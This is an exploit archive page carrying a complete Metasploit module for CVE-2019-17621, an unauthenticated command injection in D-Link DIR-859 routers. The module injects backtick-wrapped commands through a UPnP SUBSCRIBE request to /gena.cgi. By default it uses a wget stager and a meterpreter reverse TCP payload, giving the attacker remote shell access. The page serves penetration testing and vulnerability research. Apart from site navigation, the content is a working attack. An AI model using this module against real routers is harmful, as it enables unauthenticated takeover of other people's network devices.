D-Link DIR-859 Unauthenticated Remote Command Execution

D-Link DIR-859 Unauthenticated Remote Command Execution: Posted Jan 22, 2020; Authored by Miguel Mendez Z, Pablo Pollanco P | Site metasploit.com; D-Link DIR-859 Routers are vulnerable to OS command injection via the UPnP interface. The vulnerability exists in /gena.cgi (function genacgi_main() in /htdocs/cgibin), which is accessible without credentials.; tags | exploit, cgi; advisories | CVE-2019-17621; SHA-256 | ae3c3447736253b12652f3498e39b80ef8b5c39fdb23d42cf38844008d3a0195; Download | Favorite | View

D-Link DIR-859 Unauthenticated Remote Command Execution

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::CmdStager

  def initialize(info = {})
    super(update_info(info,
      'Name'        => 'D-Link DIR-859 Unauthenticated Remote Command Execution',
      'Description' => %q{
        D-Link DIR-859 Routers are vulnerable to OS command injection via the UPnP
        interface. The vulnerability exists in /gena.cgi (function genacgi_main() in
        /htdocs/cgibin), which is accessible without credentials.
      },
      'Author'      =>
        [
          'Miguel Mendez Z., @s1kr10s', # Vulnerability discovery and initial exploit
          'Pablo Pollanco P.' # Vulnerability discovery and metasploit module
        ],
      'License'     => MSF_LICENSE,
      'References'  =>
        [
          [ 'CVE', '2019-17621' ],
          [ 'URL', 'https://medium.com/@s1kr10s/d94b47a15104' ]
        ],
      'DisclosureDate' => 'Dec 24 2019',
      'Privileged'     => true,
      'Platform'       => 'linux',
      'Arch'        => ARCH_MIPSBE,
      'DefaultOptions' =>
        {
            'PAYLOAD' => 'linux/mipsbe/meterpreter_reverse_tcp',
            'CMDSTAGER::FLAVOR' => 'wget',
            'RPORT' => '49152'
        },
      'Targets'        =>
        [
          [ 'Automatic',  { } ],
        ],
      'CmdStagerFlavor' => %w{ echo wget },
      'DefaultTarget'  => 0,
      ))

  end

  def execute_command(cmd, opts)
    callback_uri = "http://192.168.0." + Rex::Text.rand_text_hex(2).to_i(16).to_s +
      ":" + Rex::Text.rand_text_hex(4).to_i(16).to_s +
      "/" + Rex::Text.rand_text_alpha(3..12)
    begin
      send_request_raw({
        'uri'  => "/gena.cgi?service=`#{cmd}`",
        'method' =>  'SUBSCRIBE',
        'headers' =>
        {
                'Callback' => "<#{callback_uri}>",
                'NT' => 'upnp:event',
                'Timeout' => 'Second-1800',
        },
      })
    rescue ::Rex::ConnectionError
      fail_with(Failure::Unreachable, "#{rhost}:#{rport} - Could not connect to the webservice")
    end
  end

  def exploit
    execute_cmdstager(linemax: 500)
  end
end

Top Authors In Last 30 Days

Red Hat 232 files
indoushka 125 files
Ubuntu 91 files
Gentoo 33 files
Debian 25 files
Jasper Nota 25 files
Willem Westerhof 19 files
Jim Blankendaal 11 files
Martijn Baalman 9 files
Apple 9 files

File Archives

Systems

AIX (429)
Apple (2,099)
BSD (377)
CentOS (58)
Cisco (1,927)
Debian (7,107)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,567)
HPUX (880)
iOS (378)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (50,890)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (489)
RedHat (16,615)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,777)
UNIX (9,440)
UnixWare (187)
Windows (6,676)
Other

D-Link DIR-859 Unauthenticated Remote Command Execution

D-Link DIR-859 Unauthenticated Remote Command Execution

File Archive:

August 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

D-Link DIR-859 Unauthenticated Remote Command Execution

Share This

D-Link DIR-859 Unauthenticated Remote Command Execution

File Archive:

August 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems